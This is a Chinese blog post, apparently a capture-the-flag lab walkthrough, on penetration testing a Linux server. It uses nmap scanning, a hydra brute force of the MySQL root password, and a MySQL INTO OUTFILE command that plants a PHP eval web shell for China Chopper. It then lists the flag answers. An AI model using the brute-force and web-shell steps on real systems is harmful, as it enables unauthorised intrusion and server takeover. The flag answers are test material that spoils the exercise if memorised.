Linux操作系统渗透测试

目录

前言:

一:

二:

三:

四:

五:

六:   



 前言:

这是关于网络安全里Linux操作系统的渗透测试,主要使用的事mysql注入,欢迎大家前来学习,借鉴。


一:

1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交;

命令:nmap –sV –O 172.16.202.250 –T5

Flag{Linux 2.6.32 - 3.10}

二:

2.通过Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为Flag提交;

命令: nmap -sV -O 172.16.202.250 -T5

 Flag{MySQL 5.1.73-log}

三:

3.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;

开放mysql端口,使用hydra去尝试爆破root账号的密码

命令:hydra -l root -p 3112ab mysql://172.16.202.250 -t 4

 

 得到账号密码,root:3112ab

使用mysql登录,并且使用select构造一句话木马,对其进行渗透

命令:select '<?php @eval($_POST['cmd']);?>' into outfile '/var/www/html/shell.php';

使用浏览器访问,并使用中国菜刀连接

 

 连接成功

 Flag{loginmanager}

四:

4.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为Flag提交;

 Flag{slkrvung}

五:

5.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为Flag提交;

 Flag{vmifeo}

   六:   

6.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag提交。

 

 Flag{glamorous}

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值